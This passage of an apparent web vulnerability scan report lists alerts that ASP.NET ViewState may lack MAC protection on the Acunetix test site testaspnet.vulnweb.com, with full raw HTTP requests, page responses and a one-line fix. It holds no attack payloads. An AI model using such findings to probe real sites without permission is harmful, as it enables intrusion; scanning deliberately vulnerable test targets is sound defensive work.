href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        11. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        12. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
